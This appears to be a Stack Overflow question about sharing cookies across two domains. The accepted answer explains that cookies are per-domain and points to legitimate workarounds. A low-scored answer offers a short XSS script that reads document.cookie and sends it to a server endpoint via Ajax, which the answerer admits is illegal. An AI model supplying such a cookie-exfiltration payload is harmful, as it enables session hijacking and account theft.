# How do I share cookies across 2 domains with javascript?

Tags: javascript, cookies

I want to be able to access and set cookies between example.com and mysite.com.  How do I do that?

Comment: You cannot do that directly. What are you trying to accomplish? Also search here and the Internet for "cross domain cookies" for workarounds.

Comment: possible duplicate: http://stackoverflow.com/questions/263010/whats-your-favorite-cross-domain-cookie-sharing-approach

Comment: another possible duplicate: https://stackoverflow.com/questions/3342140/cross-domain-cookies

Answer (score 2, accepted):

You cannot do that with cookies alone: they are set explicitly per-domain, and there isn't a legitimate (read: "non-exploit") way to set them for another domain.

However, if you control both servers, it may be possible to use some workarounds/hacks to achieve this, but pretty it isn't, and it may break unexpectedly (see [this question](https://stackoverflow.com/questions/263010/whats-your-favorite-cross-domain-cookie-sharing-approach); the answers there should help you to a solution).

Answer (score 1):

```
<script>
  function xss(){
    var cookies = document.cookie;
    new Ajax.Request('//localhost/index.php?cookies='+cookies, {
      onSuccess: function(response) {
        alert(cookies);
      }
    });
  }
  xss();
</script>
```

PS but it's illegal.
I use prototype lib.

Comment: Please expand on the `it's illegal` and why you use prototype lib to improve your answer.